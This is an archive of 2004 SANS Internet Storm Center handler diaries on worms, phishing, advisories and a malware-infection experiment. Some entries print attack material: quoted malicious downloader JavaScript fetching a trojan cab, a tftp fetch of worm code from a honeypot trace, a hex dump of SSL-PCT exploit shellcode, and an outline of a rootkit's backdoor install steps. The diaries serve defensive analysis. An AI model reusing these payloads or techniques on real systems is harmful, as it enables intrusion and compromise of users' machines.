Published: 2004-07-31

Mystery port 3072 and MS04-22 Exploit code available

TCP Port 3072

Another handler pointed out to me some interesting traffic over the past 3 days on TCP port 3072. See the DShield report at http://www.dshield.org/port_report.php?port=3072&recax=1&tarax=2&srcax=2&percent=N&days=170. After searching for a while I could not find any conclusive information about what may have been going on with this port. If anyone has some thoughts or some traffic from a honeypot on this port, it would be useful.

MS04-22 Exploit code available

A few sources have made publicly available exploit code targetted at the vulnerability addressed by Microsoft's patch released earlier this month MS04-22: http://www.microsoft.com/technet/security/bulletin/ms04-022.mspx

The samples I have seen so far are predominantly proof of concept tools and don't do anything malicious.

T. Brian Granier

Handler on Duty


Published: 2004-07-30

* A Critical IE Patch Released / Why the Internet is Like an Elephant

Microsoft Releases a Critical Patch for Internet Explorer

Today Microsoft released a patch to Internet Explorer that addresses critical vulnerabilities that may allow malicious sites to run arbitrary code on unpatched systems. These vulnerabilities have been known for some time. One of them was being actively exploited by the Scob/Ject attack that we described in:

Considering the severity of these vulnerabilities, we recommend installing this patch as soon as possible, and hope that you have a chance to consider this security bulletin before heading home for the weekend:

The following break-down of the vulnerabilities addressed by this security update is based on CVE database entries ( http://www.cve.mitre.org ):

CAN-2004-0549: The WebBrowser ActiveX control, or the Internet Explorer HTML rendering engine (MSHTML), as used in Internet Explorer 6, allows remote attackers to execute arbitrary code in the Local Security context by using the showModalDialog method and modifying the location to execute code such as Javascript, as demonstrated using (1) delayed HTTP redirect operations, and an HTTP response with a Location: header containing a "URL:" prepended to a "ms-its" protocol URI, or (2) modifying the location attribute of the window, as exploited by the Download.ject (aka Scob aka Toofer) using the ADODB.Stream object.

CAN-2004-0566: Integer signedness error in imgbmp.cxx for Windows 2000 allows remote attackers to execute arbitrary code via a BMP image with a large bfOffBits value.

CAN-2003-1048: mshtml.dll for certain versions of Internet Explorer 6.x allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code due to a malformed GIF image that triggers a buffer overflow.

Why the Internet is Like an Elephant (Personal Ramblings of a Handler)

Keep an eye on the information you make publicly available on the Internet. Usenet messages that describe your network in a firewall configuration question, job posts with position requirements that reveal the research your organization is doing, personal home pages with data that can be used to impersonate you or your friends... These tid-bids of information easily slip through our mental safety filters, but can come to haunt us years after they were posted on the Net.

Traditional search engines are quite effective at aiding attackers in finding such historical information. Furthermore, data processing services such as Eliyon allow anyone who can type to profile an individual or a company using publicly available information in no time:

Eliyon is an interesting service because it uses clever techniques for parsing Web pages to automatically build a profile about a person, as well as about companies affiliated with the person. Eliyon, much like Google, keeps a cache of relevant Web pages, making the information available even after the original source disappears.

Also, consider the wealth of information that an attacker can gather by tapping into social networking sites such as Friendster and Orkut, either manually, or with the aid of automated data collection tools. Social networking sites have a small neighborhood feel that makes the participants comfortable with revealing lots of personal data. After all, the more information one reveals, the greater the likelihood that someone will find his or her profile attractive for a job or a companionship offer. All in all, this is a social engineer's goldmine.

I'm not advocating information-release paranoia, but I do suggest considering long-term effects of the data you make publicly available about yourself, your friends, or your company. Remember that the Internet, much like an elephant, never forgets.

Lenny Zeltser

ISC Handler on Duty



Published: 2004-07-29

Updated(2): Checkpoint VPN-1 ASN.1 vulnerability, RADIUS and wireless, reminder about home routers

Checkpoint VPN-1 ASN.1 vulnerability

Yesterday afternoon, Checkpoint released a bulletin detailing a newly discovered vulnerability in ASN.1 handling in current versions of VPN-1 (specifically NG_AI R55W, NG_AI R55, NG_AI R54, NG FP3, GSX, etc. essentially all versions of NG), this is a completely different vulnerability from the ASN.1 issue several months ago. The bulletin reiterates previous advice recommending against the use of Aggressive Mode IKE. In this case, if aggressive mode is enabled, a 1 packet exploit might be possible. A hot fix has been released that addresses the vulnerability and should be applied as soon as practical on VPN-1 devices that face public networks. We've just received confirmation that version 4.1 is NOT affected by this vulnerability.


RADIUS implementations and wireless

One of the other handlers, Joshua Wright, has co-written a note for IETF, highlighting some of the weaknesses in many current implementations of the RADIUS protocol and especially their significance in wireless environments. Unfortunately, many implementations do not fully implement all the recommendations of the RFCs. This has become of greater significance since it can be used as part of a key distribution mechanism in conjunction with the 802.1x wireless protocol. The draft can be found at


Reminder about home routers

One of our readers, Chris Norton, sent us some information on an experiment that he ran. We won't go into the details today (perhaps in a future diary), but the upshot is a reminder to change default passwords/community strings and when possible disable remote administration capabilities on your home broadband routers.


Jim Clausing, jim.clausing/at/acm.org


Published: 2004-07-28

MyDoom Details, ssh password brute forcing.

MyDoom Details

Lurhq published an excellent writeup with many details
about the Zindos, the worm taking advantage of MyDoom infected systems.

If you find a MyDoom infected host, we are very interested in any copies
of the log left behind by MyDoom. Or if you have any early MyDoom samples.
See the writeup about for details about the logs.

More ssh password brute forcing

A reader discovered a system that was likely compromised as part of the
recent wave of ssh scans. The system's root account had no password configured
and was easy picking. Another ssh compromise is discussed on our DShield
mailing list: http://lists.sans.org/pipermail/list/2004-July/061219.html .
Both compromises use tools from the same repository, indicating that the
same group/individual is behind these scans and attacks.

Once connected to the system, the attacker downloaded a rootkit to gain
a foothold in the system. The bash history revealed the commands issued
by the attacker. Given several typos, and some of the command options used,
the attacker appears to be not very skilled.

First, the attacker collected some basic system information using
/etc/issue and /proc/cpuinfo (note: not uname -a). As a next step,
two tarballs are downloaded using wget. The web sites these
files origin from appear to be compromised.

Only one of the tarballs appears to be used ('tc5.tgz'). The
intruder unpacked the file, and started an installer shell script.

This script identifies the root kit as 'b0skit'. The header:

# Presenting
# -= [ tc5 bin ] =-
# by TeRmID -at- 6:55PM - Sunday, December 23th, 2001
# greetz to: hex66, keyhook, eqsol, maher_, tiggi, ch40s, pixel-fX,zK
# - manipul8r u rock dewd! ;>
# PRIVATE!! DO NOT DISTRO bijatchZ!! !termCREW memberz only _
# LAST UPDATE on Monday, February 4th, 2002
# by maher

Some of the highlights from the install script: (more later or in a
different format if there is interest.)

1 - kills syslogd

2 - detects t0rn rootkit

3 - aborts install if remote syslogging is detected (based on /etc/syslogd.conf, can be overridden)

4 - the script looks for hidden processes by comparing the output from /proc with the output from 'ps'

5 - check for tripwire, tcplogd, stmichael, snort and LIDS. Abort if either is found.

6 - replace md5sum, libproc, ldb with trojaned versions.

7 - create a new directory /usr/info/.tc2k and /usr/bin/util. Uses touch to change its creation time to the same time /bin/mv shows (probably to make it 'blend in' with other files)

8 - remove /etc/term.db (first, file attributes like immutable, append only are removed).

9 - create /dev/ida/.. /.org (again, match time with /bin/mv)

10 - remove /.bash_history (which assumes that root's home directory is /. However, this is not the case on any current Linux distribution). The
script also removes /bin/.bash_history. No idea what OS would drop a bash_history into /bin

11 - setup an ssh backdoor. The password can be specified as first command line parameter and the port it will listen on is configured as second parameter. In this case, port 7070 was specified.
md5 hashed passwords
are stored in /etc/term.db
next, a few more binaries are replaced, and again, following the prior pattern, the ctime is adjusted to match /bin/mv. The new binaries are
protected by setting the immutable, append only and overwrite attribute
(sounds like overkill. but the tool in general likes to use as many
commandline options as possible ;-) ).

The backdoor binary is installed as /usr/sbin/ldb, and a shell script
(/etc/sbin/initcheck) is added to /etc/inittab to restart the binary on reboot or on kill.

Other replaced binaries:













(the script is careful to maintain the file permissions/times)
Lastly, the script removes a number of 'competing' root kits and removes
the files it originally downloaded.

(sorry this is a bit shorter then it should be. Decrypt the message embedded in the spelling errors and typos to win an ISC bumper sticker)


Johannes Ullrich, jullrich/at/sans.org


Published: 2004-07-27

Doubleclick DDoS'd, W32.Zindos.A Microsoft DoS, FXMYDOOM Feedback

Doubleclick DDoS'd

Around 10:30 EDT Doubleclick, a provider of web advertisements, started experiencing a massive denial-of-service attack on their DNS servers. This has caused a peripheral slowdown of other sites that use the Doubleclick service to serve ads on their webpages. Read more at:

W32.Zindos.A Microsoft DoS

The W32.Zindos.A worm which infects machines via the backdoor that Backdoor.Zincite.A opens (which is delivered by MyDoom.M) performs a DoS against the microsoft.com domain. Due to the buggy code, this will cause a machine to become slow and unresponsive due to repetitive infections of Zindos. For more information go to: http://securityresponse.symantec.com/avcenter/venc/data/w32.zindos.a.html

A user wrote in stating that the FXMYDOOM program would not completely clean up a system from all the processes. He gave the following steps to ensure a clean system.

1. Reboot into safe mode with networking support and sign in.

2. Run FXMYDOOM, downloadable from Symantec. Go onto step 3 while step 2 runs.

3. Visit the “Run” sections of both HKEY_LOCAL_MACHINE and HKEY_CURRENT_USER (full example path above) and delete any calls to:
a. Javavm

b. Services

c. Tray (which will have a path to ********.exe listed in the data field)
Norton’s tool usually didn’t catch the “javavm” or “tray” entries on PC’s I worked on, so be on the lookout for them.

4. Once step 2 has completed, manually verify javavm.exe and services.exe are no longer in %windir%

5. Reboot into normal mode, ideally, user should sign-in. In absence of user, sign in yourself.

6. Once boot completes and taskbar fully loads check “processes” tab to make sure there aren’t any extra “services”, “javavm”, or “********.exe” files running. Note it is normal to have one copy of “services” running on a PC. One copy, good. Two copies, bad.

7. Re-run step 2. Have user contact you if it finds any instance of mydoom on the PC.


John Bambenek, jbamb -at- pentex-net.com


Published: 2004-07-26

MyDoom-O hits search engines hard.

MyDoom-O hits search engines hard

Update (July 27th 2004)

Symantec reports that the 'Zindos.A' backdoor dropped by MyDoom-O is
used by a worm that will attempt to DDOS microsoft.com. Infected
systems will start the DDOS right after the worm is installed and
will scan for other vulnerable systems.

Infected systems can easily be identified by looking for port 1034 TCP


The latest version of MyDoom, which started arriving in people's mail boxes in force Monday morning, uses search engines to find more recipients for its message.

Like other viruses, MyDoom-O will search the infected system for valid
e-mail addresses. However, MyDoom-O uses a new twist to find additional
e-mail addresses. It will search four different search engines (Altavista,
Google, Lycos, Yahoo) for additional e-mail addresses within the domain
of e-mail addresses found locally (e.g. if it finds someone@example.com,
it will search for additional addresses that end in @example.com).

Google and Lycos experienced significant problems as a result of the large
number of queries caused by MyDoom infected systems. However, there is
no evidence that this 'DDOS effect' was the purpose of the virus.

These MyDoom e-mails arrive in a number of different forms. Some claim to be
a bounce caused by a message the user sent earlier, others claim to be a
message from the users ISP claiming that the user sent spam and should run
the attached file.

The virus may be zipped, a plain executable or a screen saver (.scr).

Prior versions of MyDoom included a backdoor. Some Antivirus vendors report
that this version does as well. While we did observe this version to listen
on a number of ports, so far we have not been able to connect to them. However,
past versions of MyDoom required a particular header to accept the communication.

At this time, all Anti Virus vendors released updates to their signature
files, which will recognize this version of MyDoom. This version of MyDoom
is usually identified as 'M' or 'O'.
We highly recommend to download the latest signatures. As this is probably
not the last virus, we recommend reviewing your policy with respect to
attachments. Executable attachments should not be permitted. Finding a
sensible policy for zip files may be more difficult and should be tailored
to your business needs. We recommend PGP signed e-mail for attachments,
or a web based 'drop box'.

A password encrypted zip file will only help if the password is exchanged
in advance, if possible out of band (e.g. phone). In the past, viruses used
password encrypted zip files to fool anti virus engines.


MyDoom creates the executable files
C:\Windows\services.exe and java.exe, and executes them.

The following URL templates are used to query the search engines. '%s' is
replaced with the search string.




The agent id (User-Agent) is read from the registry and will match the internet explorer
version used on the infected host. The full request will look like:

GET /default.asp?lpv=1&loc=searchhp&tab=web&query=mailto+winternals.com HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: search.lycos.com
Connection: Keep-Alive

The virus is UPX packed, after unpacking, the following strings are evident:

(a) Strings that suggest that the virus attempts to decode obfuscated e-mail


(b) Mail headers for outbound mail

X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Content-Type: multipart/mixed;
MIME-Version: 1.0
Subject: %s
To: %s
From: %s

(c) Strings that are apparently used to avoid certain e-mail addresses:


MyDoom leaves a log file behind. On our test system, the log file was
dropped into C:\Documents and Setting\Locals~1\Temp\zincite.log
Sample Anti-Virus Policy


Anti Virus Vendor Links:










Johanns Ullrich, jullrich/AT/sans.org


Published: 2004-07-25

A Good Day for Phishing; SSH Followup; NIMDA, Still There; Tip for the Day

A Good Day for Phishing

If you ask someone who likes to fish, everyday is a good day for fishing. The same holds true it seems for email these days. We had yet another report by fellow handler Scott Fendley of a USBank phishing email. This site collected your personal banking information including asking for your password. The site brought up two webpages, the valid USBank web page and a second webpage that appeared to be from USBank asking you to confirm your information. The information was then posted back to the site where the request originated from. This was reported to the offender's ISP and USBank. Remember to always think before you click. Any request for your personal information that you were not expecting should be verified. Don't let yourself be the "catch of the day."

SSH Followup

A big thanks to everyone for all the log submissions in response to the diary entry http://www.incidents.org/diary.php?date=2004-07-23 by Tom Liston. We have gotten many emails with logs, but if anyone has been able to capture packets for these attempts we would like to see them.
NIMDA, Still There

As a reminder, there are many threats that appear to have come and gone. NIMDA is one of those that most folks consider old news. However, we had another report of it yesterday trying to compromise a webserver. This is just a reminder to everyone to always keep your webservers patched and secure. Don't get caught by something that should be easy to prevent.

Tip for the Day

Many people use credit cards for online purchases. One thing you can do to help protect yourself is to get a credit card that you only use for online purchases and have the limit set low, say for $500. This way if your information is stolen, you have a lower limit for which someone can take advantage. Always make sure to keep an eye on that credit card statement.
Some banks will allow you to setup a one-time use only card number online, or a temporary number that is only valid for a couple of months and has a smaller limit then your main card.
For more information on what you can be held liable for and steps you can take if you believe that your credit card information has been stolen see
Lorna J. Hutcheson

Handler on Duty



Published: 2004-07-24

AV Diversification, Next Generation Network Defense

Anti-Virus Protection Through Diversification, Handler Soap Box

An important maxim is "Defense In-depth," or protecting your assets through multiple layers of security mechanisms. A key part of this strategy should also include "Defense Through Diversification," not relying on the components from any single vendor in these different layers.

In this age of zero-day virus infections that spread rapidly through our computers on the Internet, relying on a single Anti-virus application to protect your entire enterprise may leave you exposed to threats which that vendor's products can not, yet, detect.

Gary Robinson, of 2Wise Guys PC Repair, e-mailed the Handlers today with just such a situation, where a virus was not detected by Norton Anti-Virus, but was successfully quarantined by Grisoft's AVG.

A comprehensive in-depth and diversified anti-virus solution could employ one anti-virus solution on their e-mail server or gateway, then another product on users' workstations. Going further, a network-based content filter could be deployed at the network border. By layering these pieces from different companies, your odds of successfully detecting and managing a new infection increase significantly.

Next Generation Network Defense

Scott Weil, the director of the
SANS Local Mentor Program, had an opportunity to meet with about 40
students from a Midwest math and science academy on Friday to discuss
network security. The students ranged in age from 10 to 15 years old.

Prior to beginning his talk on ways that kids can surf safely online,
Scott divided the room into two groups. One group was told to design an
attack on the school's network, the other group was told to defend
against an attack. After discussing it for a few moments, each group
was asked to explain to Scott and the rest of the students what they

The level of understanding at this age is shocking. Briefly, here is
what each group said they would do.

Attacking group:

- Map the network to find the computers

- Map the connections

- Understand the details of the OS--they all said they hoped the OS was
Windows; they were going to research all known vulnerabilities of
Windows to plan the attack

- Attack the network by installing a virus via a memory stick onto a
node of the network and then engineer a denial of service attack via
spam emails

- Disable antivirus software on the network, although they didn't say

Defending group:

- Use Macs as the operating system because its Unix operating system was
more secure than Windows

- Make sure their anti-virus software was well tuned and current

- Monitor the firewall for any unusual activity

- Install a network tracker to document any illegal activities and then
call in the local law enforcement

- Make sure that they had applied the latest patches to every piece of
software and hardware on their network

Each group appointed a spokesperson for the group. The leader for the
defense of the network and perimeter was a 10 year old.

Brute Force PW Scans Submissions

The Handlers have received a number of submissions in regards to Tom's request, yesterday, for logs of possible brute-force authentication attempts against SSH. Thanks to all those who have responded. Please continue (or start) to check your logs for failed login attempts, and submit them to the Handlers group.


Reading Room

Last week, there was a thread on the Security Focus Firewalls list regarding egress filtering. So, your Saturday evening reading material is an oldy, but a goody. This paper was written by Chris Brenton back in February, 2000, and discusses this topic, and provides practical implementation examples for several different types of routers/firewalls.

Warning, clicking on this link and downloading the paper may falsely trigger some personal firewalls, due to a string contained within that some mistake as a threat. You may permit this to be accessed without fear of infection!


Thread reference:


Handler on Duty - Dave Brookshire <dsbATrlxDOTcom>


Published: 2004-07-23

More Brute-Force PW Scans, Opteron Exposed, Follow the Bouncing Malware - Part I

Brute Force PW Scans

We've had new reports of brute-force password attempts, this time, against SSH. Please check your logs and let us know if you find recent attempts so we can gauge how widespread these attempts appear to be.

Opteron Exposed

There was an interesting article recently posted at PacketStorm discussing the possibility of flashing the microcode within an Opteron processor. It appears that AMD doesn't have much in the way of authentication on updates to the microcode in the Opteron. This has the potential to be a significant problem.


Follow the Bouncing Malware - Part I

On July 20th, after investigating some adware/spyware/malware that had been loaded onto a machine without the user's knowledge, I decided to try an experiment. I wondered just exactly how easy it really was to get an unpatched machine compromised, and what it would look like to "Joe Average" computer user. I set up a VMWare image of a fresh install of Windows XP Home Edition, and headed out on the internet to see just exactly what happened. My trip was an enlightening journey into the dangers lurking out on the 'net for the unwary, and along the way I've learned some interesting things about the spyware/adware industry.

Today's diary entry represents the first part of my analysis of what happened when I "forgot to use protection" on the Internet. In part II, I'll examine the full extent of the damage that my poor "Joe Average" would have received, and perhaps add a little "editorializing" to my findings.

To give you a little "preview", I'll say this: I discovered that as far as the adware/spyware industry is concerned, you may be the one that plunked down a grand at your local consumer electronics store to purchase your PC, but THEY own it. They'll do whatever they want, whenever they want, and you don't get a say in the matter. The utter "ballsy-ness" of what they do will astonish you, and I hope reading this might make some of the people enabling this sort of activity to wake up and take action.

Obviously, what happened in my little experiment would be a result of where I decided to go on the net. To be perfectly fair, the sites that will be mentioned in this essay are only a cross-section of the evil that is waiting out there on the net - they're probably no better, or worse than any of the other adware/spyware ilk. My choice of a "starting point" was based on the incident that I had just investigated.

In deciding to be "Joe Average", I tried to replicate (as well as possible) the machine that I had just investigated. That machine had IE6.0 with the Google Toolbar installed with the popup blocker active. Please keep this setup in mind as I "follow the bouncing malware."

Also, something to keep in mind: I'm not going to set up any of the URLs in this tale so that they act as hyperlinks. This is done on purpose. DO NOT FOLLOW THE PATH I'M DESCRIBING HERE, ESPECIALLY IF YOU ARE RUNNING AN UNPATCHED MACHINE. THIS MEANS YOU. REALLY.

After installing the Google Toolbar, I did exactly what my "Joe Average" had done to get his machine compromised: Googled. Someone had told him about "Yahoo Games", and well, he wanted to check it out. I put "Yahoo games" into Google and then (for whatever reason... hey, it's what my "Joe Average" did) skipped several obvious links leading to Yahoo! and clicked instead on "www.yahoogamez.com" (NOTE: If you're running an unpatched machine, DO NOT GO THERE).

yahoogamez.com is a website that contains links to many different online games, and while I have no idea if their games are any good, their advertisements are certainly interesting. Like many websites which offer online games, the idea here is to get people to visit the site and generate revenue based on advertising that appears on the site and provides an income based on both the number of times an ad is displayed ("impressions") and, especially, on any "click through" traffic. Generally, the site owner contracts with another company that acts as a "go-between", selling "placement" to advertisers, and contracting with sites to display ads. Many of these online advertising companys then provide servers that, on a rotating basis, dole out the code and images for ads to participating websites.

In two instances on the yahoogamez.com site, there are ads provided by "aim4media.com". Going to the yahoogames website results in a flurry of HTTP activity, including the following

[20/Jul/2004:13:50:11 -0500] "GET_http://adserver.aim4media.com" - - "/adframe.php?n=a788e363&what=zone:450&;%20amp;target=_new HTTP/1.1"

Which results in the following HTML:




This results in the following HTTP GET:

[20/Jul/2004:13:50:14 -0500] "GET_http://" - - "/mynet/mynet-MML.html HTTP/1.1"


And the following HTML gets downloaded:


Looks like someone is trying to hide something... This decodes to:


[20/Jul/2004:13:50:17 -0500] "GET_http://" - - "/hp2/hp2.htm HTTP/1.1"

Which gives us:



Which decodes to:


[20/Jul/2004:13:50:20 -0500] "GET_http://" - - "/hp2//HP2.CHM HTTP/1.1"

Within this chm exploit, we find the following hp2.htm file:



Following along...

[20/Jul/2004:14:03:55 -0500] "GET_http://" - - "/vu083003/object-c002.cgi HTTP/1.1"



Well, our home page just got changed, as did our default search engine... Nice, real nice. But that's not all... there was a file called "hp2.exe" that was downloaded and executed by our .chm exploit. Sure enough, looking at my logs, I found:

[20/Jul/2004:13:50:25 -0500] "GET_http://" - - "/hp2//hp2.exe HTTP/1.1"

hp2.exe is what is known as a "dropper" program. That is, it is actually a small "stub" program with another (sometimes more than one) program attached to it as "data". When the program executes, it writes out the "data" to a file and then executes the resulting program. hp2.exe drops a UPX packed executable that, when executed, will contact www.totalvelocity.com/Bundling/tvmupdater4bp5.exe, which installs/updates the "TV Media Display" spyware.

At this point, I followed one link on the site, that required I have Flash installed. Since I didn't have Flash installed, I went "back". But because I now had cookies placed on my computer from my original visit to the site, one of yahoogamez' files, popup.js, does something differently:

Now, this code within popup.js is executed:


if ((document.cookie.indexOf("popuptraffic") != -1 ) && (document.cookie.indexOf("popupsponsor") == -1)){
var expdate = new Date((new Date()).getTime() + 1800000);
document.cookie="popupsponsor=general; expires=" + expdate.toGMTString() + "; path=/;";


[20/Jul/2004:13:51:57 -0500] "GET_http://addictivetechnologies.net" - - "/dm0/js/Confirmfr03tp.js HTTP/1.1"


var exepath='http://www.addictivetechnologies.net/DM0/cab/fr03tp.cab';
var retry_enabled = true;
var retry_cnt=1;
function retry() {
if(retry_cnt>0) {
alert("To install latest AT- Games update, please click Yes");
} else {
//alert("This is a 1 time install, once you click Open it will never pop up this message again");
//downloads_manager.window.location = "http://www.addictivetechnologies.net/DM0/exe/fr03tp.exe";
function start_download()
var bname=navigator.appName;
var bver=parseInt(navigator.appVersion);
if ( navigator.platform && navigator.platform != 'Win32' ){
//alert("Sorry, your browser is not WIN32 Compatible");
if (bname == 'Microsoft Internet Explorer' && bver >= 2){
document_code = '\n';
document_code += '\n';
document_code += ' classid="clsid:00000EF1-0786-4633-87C6-1AA7A44296DA"
document_code += '';
else if (bname == 'Netscape' && bver >= 4) {
trigger = netscape.softupdate.Trigger;
if (trigger.UpdateEnabled) {
//trigger.StartSoftwareUpdate(exepath, trigger.DEFAULT_MODE)
} else {
} else {


[20/Jul/2004:13:51:58 -0500] "GET_http://www.addictivetechnologies.net" - - "/DM0/cab/fr03tp.cab HTTP/1.1"

This cab file contains two files:

ATPartners.inf - 403 bytes

ATPartnets.dll - 96,256 bytes

The .dll file is identified by AV software as Win32/TrojanDownloader.Rameh.C trojan

And that's were I'm going to end it for today. In the next part, I'll take a look at what happens as this chain of malware continues on it's merry way, and I'll also investigate what happens when I fire up IE the next time and visit my new home page.


Handler on Duty - Tom Liston ( http://www.labreatechnologies.com )


Published: 2004-07-22

Samba - Buffer Overrun, HP Remote Command Execution, Top 15 Worms, Hosts File, Sasser/Dabber Activity

Samba - Security Advisory #2004-014

Multiple Potential Buffer Overruns - The internal routine used by the Samba Web Administration Tool (SWAT v3.0.2 and later) to decode the base64 data during HTTP basic authentication is subject to a buffer overrun caused by an invalid base64 character.


HP - Security Advisory
dced Remote Command Execution - A buffer overflow vulnerability was discovered in HP's implementation of the DCE endpoint mapper (epmap) which listens by default on TCP port 135. Successful exploitation of this vulnerability may allow an attacker to execute arbitrary commands on the targeted system
with the privileges of the DCED process which is typically run as the root user.


Top 15 Worms

One of our Handler's, Pedro Bueno, emailed a list of the top 15 items attempting tftp download from his honeypot. Thanks to Pedro for sharing this list with us.

540 wuamgrd.exe; 291 scvhost.exe; 276 demm386.exe; 264 vsmons.exe; 250 lsac.exe; 174 rundll32a.exe; 159 MSlti16.exe; 97 svcohst.exe; 92 Mcafeescn.exe
50 msnetcfgs.exe; 38 msupdate.exe; 34 sxvhost.exe;34 realplayer32.exe; 29 NAVscan32.exe; 27 sys32cfg.exe
Hosts File

The hosts file is being altered or deleted by some viruses/bots. This file contains the mappings of IP addresses to host names. This file is loaded into memory at startup, then Windows checks the Hosts file before it queries any DNS servers, which enables it to override addresses in the DNS. The file is located in different directories depending on the version of the Windows Operating System you are using.

Win 98\ME = C:\WINDOWS


(After making changes to the hosts file, you can force Windows to refresh the name cache by running "ipconfig /flushdns") -JW
Sasser and Dabber Still Quite Active

Port 5554 (sasser)

Port 1023 (Sasser alternate FTP port)

Port 9898 (dabber)

Handler on Duty

Deb Hale



Published: 2004-07-21

AIM Phishing, Windows file integrity flashback, pstools vulnerability

AIM Phishing

Phishing is not just for e-mail anymore. A reader associated with
antiphishing.org reported a new twist to this scheme that advertises
malicious URLs via Instant Messaging. This scheme has been used a
few times in the past to distribute viruses.

This new message reads "you have been sent a picture. To view it,
Click here". In this sample, the 'From' address is four random
letters. However, a 'trusted' name could be used.

It is important to understand that most instant messaging systems use
only weak authentication schemes. Instant messaging is not a tool to
exchange confidential information. Only few instant messaging systems
allow for encryption and sophisticated authentication. If you need
instant messaging to communicate confidential information, use a system
which allows you to control the server and provides for encryption and
reasonable authentication. Jabber is an example of a free package.

Flashback: Windows Host Based IDS

Based on my earlier request for Windows based file integrity checkers,
I got a number of responses recommending Osiris from Shmoo.com:

Sysinternals pstools vulnerability

pstools, a collection of utilities from sysinternals, do not properly
disconnect from $IPC and $ADMIN shares. As a result, a local user
could gain admin privileges on a remote host, if the remote host uses
the tools. These tools are frequently used when
analyzing malicious code. If you are using these tools, make sure
you update to version 2.05

Looking for contributors

Do you run a personal firewall on your DSL/Cable Modem connection? We
are looking for more small (1-16 IPs) firewall log submitters. Its not
all that hard to get started. See http://www.dshield.org/howto.php for
details. If you have a nice script to setup a Linux system to submit
logs, share it with us. We do have parsers/clients for many many different
firewalls of all sizes.

Johannes Ullrich (jullrich_AT_sans.org), emergency backup handler for George Bakos.


Published: 2004-07-20

Vsmons.exe / Port 6112 / USBank phishing / MS04-22 Update


We received a report about traffic on port 445 and an application called vsmons.exe (not the Zone Alarm vsmon.exe).
If you have a sample of such application, please send to us, and our malware group will take a look at it.

UPDATE: this looks like sasser. The following hpot trace shows similar file:

tftp -i xxx.xxx.91.114 get vsmons.exe


Reference: http://wilderssecurity.com/showthread.php?t=41732
Traffic Spikes

Another report related strange traffic is about port 6112 TCP. A user noticed a spike on this port and wonder if such may be result of the recent CDE vulnerability. There were some recent spikes on the last 40 days, according ISC data, but the sources remain stable.

Reference: http://isc.sans.org/port_details.php?port=6112
USBank phishing

We received a USBank phishing report. This one is interesting because it uses a javascript to create a window with a valid usbank url on the top of the fake url.
This is interesting but not new. A post at bugtraq on may 13, shows a very similar phishing. The difference here is the fake url, that in this example is http://www.usbnk-update.info/secure and in the previous was http://validation-required.info .
Again, this only works on IE.

Reference: http://www.securityfocus.com/archive/1/363326

MS04-22 Update

Microsoft just updated the MS04-22 security bulletin. You will find more work arounds. This may help some people that had some problems with the patch.

Reference: http://www.microsoft.com/technet/security/bulletin/MS04-022.mspx


Handler on Duty: Pedro Bueno (bueno_AT_ieee.org)


Published: 2004-07-18

more https scanning reports

More HTTPS Scanning Reports

We did receive more packet captures registering scans for the SSL-PCT
exploit. It still appears like the THC exploit is used and additional
code is downloaded to the affected systems via tftp.

Problems With MS04-022

One reader reported problems installing MS04-022. This is in particular
of interest as an exploit for this vulnerability is already public. As
usual, we do advice to carefully test patches. The report we received
indicates that tasked scheduled with the task scheduler did no longer
execute. A sample error message:

0x8004130f: No account information could be found

in the Task Scheduler security database for the

task indicated.

Port 2003

A possible command channel / remote shell has been found on port 2003 in a
specific network. No widespread use of this port has been registered.

Host Based IDS for Windows

Frequently, users ask how to make sure that a system has not been compromissed, or how to determine for sure the scope of a compromise. Host based intrusion
detection systems are a good way to detect altered binaries. For Linux, a
wide range of free and commercial systems exist (AIDE, tripwire, SNARE), which
will catalog system files and save cryptographically secured checksums. We
would like to hear what users are recommending for Windows systems.

(Update: A few users commented that GFI Languard is available for Windows
http://www.sans.org/rr/papers/index.php?id=1396 )

Johannes Ullrich, jullrich _AT_ sans.org


Published: 2004-07-17

Increased SSL Activity; Exploits for MS04-022; Mailbag

New Reports of Increased SSL Activity
(Thanks to Chris Carboni for adding this entry)

We've received several reports of increased SSL activity reminiscent of activity seen last April after the release of MS04-011.

Preliminary analysis of Dshield data ( http://isc.sans.org/port_details.php?port=443 ) shows a sharp rise in activity beginning at some point on 7/15 UDT.

Data is currently being analyzed to determine if this is a re-hash of older exploits or if this activity has been generated by either a new exploit or a variation of older exploits.

From one of the submission, the payload was:

80 62 01 02 BD 00 01 00 01 00 16 8F 82 01 00 00 .b..............

00 EB 0F 54 48 43 4F 57 4E 5A 49 49 53 21 32 5E ...THCOWNZIIS!2^

BE 98 EB 25 23 28 45 49 25 53 02 06 6C 59 6C 59 ...%#(EI%S..lYlY

F8 1D 9C DE 8C D1 4C 70 D4 03 58 46 57 53 32 5F ......Lp..XFWS2_

33 32 2E 44 4C 4C 01 EB 05 E8 F9 FF FF FF 5D 83 32.DLL........].

ED 2C 6A 30 59 64 8B 01 8B 40 0C 8B 70 1C AD 8B .,j0Yd...@..p...

78 08 8D 5F 3C 8B 1B 01 FB 8B 5B 78 01 FB 8B 4B x.._<.....[x...K

1C 01 F9 8B 53 24 01 FA 53 51 52 8B 5B 20 01 FB ....S$..SQR.[ ..

31 C9 41 31 C0 99 8B 34 8B 01 FE AC 31 C2 D1 E2 1.A1...4....1...

84 C0 75 F7 0F B6 45 09 8D 44 45 08 66 39 10 75 ..u...E..DE.f9.u

E1 66 31 10 5A 58 5E 56 50 52 2B 4E 10 41 0F B7 .f1.ZX^VPR+N.A..

0C 4A 8B 04 88 01 F8 0F B6 4D 09 89 44 8D D8 FE .J.......M..D...

4D 09 75 BE FE 4D 08 74 17 FE 4D 24 8D 5D 1A 53 M.u..M.t..M$.].S

FF D0 89 C7 6A 02 58 88 45 09 80 45 79 0C EB 82 ....j.X.E..Ey...

89 CE 31 DB 53 53 53 53 56 46 56 FF D0 89 C7 55 ..1.SSSSVFV....U

58 66 89 30 6A 10 55 57 FF 55 E0 8D 45 88 50 FF Xf.0j.UW.U..E.P.

55 E8 55 55 FF 55 EC 8D 44 05 0C 94 53 68 2E 65 U.UU.U..D...Sh.e

78 65 68 5C 63 6D 64 94 31 D2 8D 45 CC 94 57 57 xeh\cmd.1..E..WW

57 53 53 FE CA 01 F2 52 94 8D 45 78 50 8D 45 88 WSS....R..ExP.E.

50 B1 08 53 53 6A 10 FE CE 52 53 53 53 55 FF 55 P..SSj...RSSSU.U

